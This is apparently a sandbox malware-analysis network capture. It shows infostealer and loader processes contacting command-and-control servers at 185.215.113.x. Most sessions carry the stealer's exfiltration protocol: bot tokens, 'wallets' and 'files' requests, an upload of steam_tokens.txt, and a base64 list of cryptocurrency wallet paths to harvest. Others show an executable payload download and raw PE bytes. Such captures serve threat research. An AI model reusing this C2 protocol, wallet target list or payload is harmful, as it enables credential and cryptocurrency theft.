8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Sep 3, 2024 17:13:32.319324017 CEST	202	OUT	POST /2fb6c2cc8dce150a.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BGDBKKFHIEGDHJKECAAK Host: 185.215.113.17 Content-Length: 1003 Connection: Keep-Alive Cache-Control: no-cache
Sep 3, 2024 17:13:32.830459118 CEST	202	IN	HTTP/1.1 200 OK Date: Tue, 03 Sep 2024 15:13:32 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=84 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 3, 2024 17:13:32.909128904 CEST	468	OUT	POST /2fb6c2cc8dce150a.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BKFIJJEGHDAEBGCAKJKF Host: 185.215.113.17 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 4b 46 49 4a 4a 45 47 48 44 41 45 42 47 43 41 4b 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 37 36 30 66 35 64 62 64 37 61 39 32 38 65 34 63 30 38 64 39 30 64 61 64 39 66 36 32 32 38 35 66 32 64 63 33 33 39 37 36 66 30 31 66 37 38 30 61 63 36 37 36 31 61 63 38 61 33 35 39 38 34 39 64 37 64 34 32 34 64 61 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 49 4a 4a 45 47 48 44 41 45 42 47 43 41 4b 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 49 4a 4a 45 47 48 44 41 45 42 47 43 41 4b 4a 4b 46 2d 2d 0d 0a Data Ascii: ------BKFIJJEGHDAEBGCAKJKFContent-Disposition: form-data; name="token"e760f5dbd7a928e4c08d90dad9f62285f2dc33976f01f780ac6761ac8a359849d7d424da------BKFIJJEGHDAEBGCAKJKFContent-Disposition: form-data; name="message"wallets------BKFIJJEGHDAEBGCAKJKF--
Sep 3, 2024 17:13:33.180236101 CEST	1236	IN	HTTP/1.1 200 OK Date: Tue, 03 Sep 2024 15:13:33 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 2408 Keep-Alive: timeout=5, max=83 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED] Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
Sep 3, 2024 17:13:33.183033943 CEST	466	OUT	POST /2fb6c2cc8dce150a.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KJDGIJECFIEBFIDHCGHD Host: 185.215.113.17 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 4a 44 47 49 4a 45 43 46 49 45 42 46 49 44 48 43 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 37 36 30 66 35 64 62 64 37 61 39 32 38 65 34 63 30 38 64 39 30 64 61 64 39 66 36 32 32 38 35 66 32 64 63 33 33 39 37 36 66 30 31 66 37 38 30 61 63 36 37 36 31 61 63 38 61 33 35 39 38 34 39 64 37 64 34 32 34 64 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 47 49 4a 45 43 46 49 45 42 46 49 44 48 43 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 47 49 4a 45 43 46 49 45 42 46 49 44 48 43 47 48 44 2d 2d 0d 0a Data Ascii: ------KJDGIJECFIEBFIDHCGHDContent-Disposition: form-data; name="token"e760f5dbd7a928e4c08d90dad9f62285f2dc33976f01f780ac6761ac8a359849d7d424da------KJDGIJECFIEBFIDHCGHDContent-Disposition: form-data; name="message"files------KJDGIJECFIEBFIDHCGHD--
Sep 3, 2024 17:13:33.449421883 CEST	202	IN	HTTP/1.1 200 OK Date: Tue, 03 Sep 2024 15:13:33 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=82 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 3, 2024 17:13:33.471259117 CEST	564	OUT	POST /2fb6c2cc8dce150a.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FHCBGDAAFBKEBGDHDBKE Host: 185.215.113.17 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 48 43 42 47 44 41 41 46 42 4b 45 42 47 44 48 44 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 37 36 30 66 35 64 62 64 37 61 39 32 38 65 34 63 30 38 64 39 30 64 61 64 39 66 36 32 32 38 35 66 32 64 63 33 33 39 37 36 66 30 31 66 37 38 30 61 63 36 37 36 31 61 63 38 61 33 35 39 38 34 39 64 37 64 34 32 34 64 61 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 42 47 44 41 41 46 42 4b 45 42 47 44 48 44 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 42 47 44 41 41 46 42 4b 45 42 47 44 48 44 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------FHCBGDAAFBKEBGDHDBKEContent-Disposition: form-data; name="token"e760f5dbd7a928e4c08d90dad9f62285f2dc33976f01f780ac6761ac8a359849d7d424da------FHCBGDAAFBKEBGDHDBKEContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------FHCBGDAAFBKEBGDHDBKEContent-Disposition: form-data; name="file"------FHCBGDAAFBKEBGDHDBKE--
Sep 3, 2024 17:13:33.809351921 CEST	202	IN	HTTP/1.1 200 OK Date: Tue, 03 Sep 2024 15:13:33 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=81 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 3, 2024 17:13:33.838799953 CEST	473	OUT	POST /2fb6c2cc8dce150a.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----ECFCBFBGDBKJKECAAKKF Host: 185.215.113.17 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 43 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 37 36 30 66 35 64 62 64 37 61 39 32 38 65 34 63 30 38 64 39 30 64 61 64 39 66 36 32 32 38 35 66 32 64 63 33 33 39 37 36 66 30 31 66 37 38 30 61 63 36 37 36 31 61 63 38 61 33 35 39 38 34 39 64 37 64 34 32 34 64 61 0d 0a 2d 2d 2d 2d 2d 2d 45 43 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 45 43 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 2d 2d 0d 0a Data Ascii: ------ECFCBFBGDBKJKECAAKKFContent-Disposition: form-data; name="token"e760f5dbd7a928e4c08d90dad9f62285f2dc33976f01f780ac6761ac8a359849d7d424da------ECFCBFBGDBKJKECAAKKFContent-Disposition: form-data; name="message"ybncbhylepme------ECFCBFBGDBKJKECAAKKF--
Sep 3, 2024 17:13:34.162821054 CEST	202	IN	HTTP/1.1 200 OK Date: Tue, 03 Sep 2024 15:13:33 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=80 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 3, 2024 17:13:34.572696924 CEST	473	OUT	POST /2fb6c2cc8dce150a.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EBGIEGCFHCFHIDHIJECA Host: 185.215.113.17 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 42 47 49 45 47 43 46 48 43 46 48 49 44 48 49 4a 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 37 36 30 66 35 64 62 64 37 61 39 32 38 65 34 63 30 38 64 39 30 64 61 64 39 66 36 32 32 38 35 66 32 64 63 33 33 39 37 36 66 30 31 66 37 38 30 61 63 36 37 36 31 61 63 38 61 33 35 39 38 34 39 64 37 64 34 32 34 64 61 0d 0a 2d 2d 2d 2d 2d 2d 45 42 47 49 45 47 43 46 48 43 46 48 49 44 48 49 4a 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 45 42 47 49 45 47 43 46 48 43 46 48 49 44 48 49 4a 45 43 41 2d 2d 0d 0a Data Ascii: ------EBGIEGCFHCFHIDHIJECAContent-Disposition: form-data; name="token"e760f5dbd7a928e4c08d90dad9f62285f2dc33976f01f780ac6761ac8a359849d7d424da------EBGIEGCFHCFHIDHIJECAContent-Disposition: form-data; name="message"wkkjqaiaxkhb------EBGIEGCFHCFHIDHIJECA--
Sep 3, 2024 17:13:36.368395090 CEST	202	IN	HTTP/1.1 200 OK Date: Tue, 03 Sep 2024 15:13:34 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=79 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.8	49727	185.215.113.26	80	4208	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:13:15.910586119 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 3, 2024 17:13:16.724441051 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 3, 2024 17:13:16.730302095 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Sep 3, 2024 17:13:17.066814899 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.8	49728	185.215.113.16	80	3212	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:13:16.099689007 CEST	184	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 30 36 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000066001&unit=246122658369
Sep 3, 2024 17:13:17.066745996 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.8	49730	52.212.52.84	80	3212	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:13:17.073832989 CEST	70	OUT	GET /3846636/Set-up.exe?hash=AgADDB HTTP/1.1 Host: ddl.safone.dev
Sep 3, 2024 17:13:17.757090092 CEST	842	IN	HTTP/1.1 200 OK Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1725376397&sid=c4c9725f-1ab0-44d8-820f-430df2718e11&s=VilhT43dcQ97n4%2FR1A6OUR7y7cX7vgwTNa3Nehky6XA%3D"}]} Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1725376397&sid=c4c9725f-1ab0-44d8-820f-430df2718e11&s=VilhT43dcQ97n4%2FR1A6OUR7y7cX7vgwTNa3Nehky6XA%3D Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]} Connection: keep-alive Content-Type: application/x-msdownload Range: bytes=0-6662058 Content-Range: bytes 0-6662058/6662059 Content-Disposition: attachment; filename="Set-up.exe" Accept-Ranges: bytes Content-Length: 6662059 Date: Tue, 03 Sep 2024 15:13:17 GMT Server: Python/3.8 aiohttp/3.9.3 Via: 1.1 vegur
Sep 3, 2024 17:13:18.789760113 CEST	1236	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELLf2_E&#GZfH@.~f
Sep 3, 2024 17:13:18.789773941 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Sep 3, 2024 17:13:18.789786100 CEST	1236	IN	Data Raw: 00 8b 15 10 70 8c 00 85 d2 0f 84 a1 00 00 00 8d 65 f0 59 5b 5e 5f 5d 8d 61 fc c3 8d 74 26 00 90 0f b7 45 d4 e9 15 ff ff ff 8d b4 26 00 00 00 00 a1 28 47 f3 00 bb 01 00 00 00 83 f8 01 0f 85 ff fd ff ff c7 04 24 1f 00 00 00 e8 39 d4 47 00 a1 28 47 Data Ascii: peY[^_]at&E&(G$9G(GD$$G(G$G&v$qO&GpeY[^_]afD$$(GGnE
Sep 3, 2024 17:13:18.789798021 CEST	1236	IN	Data Raw: 24 d0 00 00 00 8b 85 d4 00 00 00 89 84 24 cc 00 00 00 8b 85 d0 00 00 00 89 84 24 c8 00 00 00 8b 85 cc 00 00 00 89 84 24 c4 00 00 00 8b 85 c8 00 00 00 89 84 24 c0 00 00 00 8b 85 c4 00 00 00 89 84 24 bc 00 00 00 8b 85 c0 00 00 00 89 84 24 b8 00 00 Data Ascii: $$$$$$$$$$$$$$$$$$$
Sep 3, 2024 17:13:18.789809942 CEST	1236	IN	Data Raw: 10 89 55 a8 8b 45 08 8b 40 40 8b 00 dd 00 8b 45 08 8b 40 3c 8b 00 8b 08 89 4d a4 8b 45 08 8b 40 1c 8b 00 dd 00 8b 45 08 8b 40 20 8b 00 8b 18 89 5d a0 8b 45 08 8b 40 48 8b 00 dd 00 8b 45 08 8b 40 38 8b 00 8b 30 89 75 9c 8b 45 08 8b 40 1c 8b 00 dd Data Ascii: UE@@E@<ME@E@ ]E@HE@80uE@E@`8}E@LUE@T8E@T0E@`E@@E@xE$E$E$E$E$E$E$E
Sep 3, 2024 17:13:18.789819956 CEST	1236	IN	Data Raw: e1 90 c9 c3 55 89 e5 83 ec 18 8b 45 08 8b 40 04 8b 10 8b 45 08 8b 00 8b 00 89 54 24 04 89 04 24 e8 2d d5 41 00 8b 45 08 c7 40 08 00 00 00 00 90 c9 c3 55 89 e5 83 ec 28 c7 45 ec 7d 22 40 00 c7 45 f0 7b 22 40 00 c7 45 f4 00 00 00 00 8b 45 f4 8b 44 Data Ascii: UE@ET$$-AE@U(E}"@E{"@EEDED$ED$E$w>UE@LP E@]UE@ ]UE}t}uEEfEUWVSLE@ E@0
Sep 3, 2024 17:13:18.789885998 CEST	1236	IN	Data Raw: 24 88 00 00 00 dd 9c 24 80 00 00 00 d9 cc 8b 4d c4 89 4c 24 7c 8b 4d c0 89 4c 24 78 8b 4d bc 89 4c 24 74 8b 4d b8 89 4c 24 70 dd 5c 24 68 d9 ca 8b 4d b4 89 4c 24 64 8b 4d b0 89 4c 24 60 8b 4d ac 89 4c 24 5c 8b 4d a8 89 4c 24 58 8b 4d a4 89 4c 24 Data Ascii: $$ML$\|ML$xML$tML$p\$hML$dML$`ML$\ML$XML$TML$P\$HML$D\$<\$4ML$0\$(\$ ML$ML$\|$t$\$]\$T$$%RDUdE#[^_]UEE@ 1=E
Sep 3, 2024 17:13:18.791635990 CEST	1236	IN	Data Raw: 8d 45 34 89 45 c4 8d 45 38 89 45 c8 8d 45 3c 89 45 cc 8d 45 40 89 45 d0 8d 45 44 89 45 d4 8d 45 48 89 45 d8 8d 45 4c 89 45 dc 8d 45 50 89 45 e0 8d 45 54 89 45 e4 8d 45 58 89 45 e8 8d 45 5c 89 45 ec 8b 45 f0 83 f8 01 77 11 8b 45 f0 8b 44 85 90 8d Data Ascii: E4EE8EE<EE@EEDEEHEELEEPEETEEXEE\EEwEDU$UE@T]UE$ E@]U(E,@E,@EEDE$d=EEDUHENMEEE
Sep 3, 2024 17:13:18.791647911 CEST	1236	IN	Data Raw: 00 00 8d 45 08 89 45 bc 8d 45 0c 89 45 c0 8d 45 10 89 45 c4 8d 45 14 89 45 c8 8d 45 18 89 45 cc 8d 45 1c 89 45 d0 8d 45 20 89 45 d4 8d 45 24 89 45 d8 8d 45 28 89 45 dc 8d 45 2c 89 45 e0 8d 45 30 89 45 e4 8d 45 34 89 45 e8 8d 45 38 89 45 ec 8b 45 Data Ascii: EEEEEEEEEEEEE EE$EE(EE,EE0EE4EE8EEwEDU$UE}t}uEEEU8E}t}u23ED$ED$ED$ED$E$RAEUE
Sep 3, 2024 17:13:18.791657925 CEST	1236	IN	Data Raw: 24 34 8b 45 38 89 44 24 30 8b 45 34 89 44 24 2c 8b 45 30 89 44 24 28 8b 45 2c 89 44 24 24 8b 45 28 89 44 24 20 8b 45 24 89 44 24 1c 8b 45 20 89 44 24 18 8b 45 1c 89 44 24 14 8b 45 18 89 44 24 10 8b 45 14 89 44 24 0c 8b 45 10 89 44 24 08 8b 45 0c Data Ascii: $4E8D$0E4D$,E0D$(E,D$$E(D$ E$D$E D$ED$ED$ED$ED$ED$E$p$EUU8E6@E26@EEDED$ED$ED$ED$E$DUWVSE@EE@,]E@@U

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.8	49731	185.215.113.26	80	4208	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:13:17.177862883 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 3, 2024 17:13:17.989438057 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 3, 2024 17:13:17.990113020 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Sep 3, 2024 17:13:18.255578995 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.8	49733	185.215.113.26	80	4208	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:13:18.378925085 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
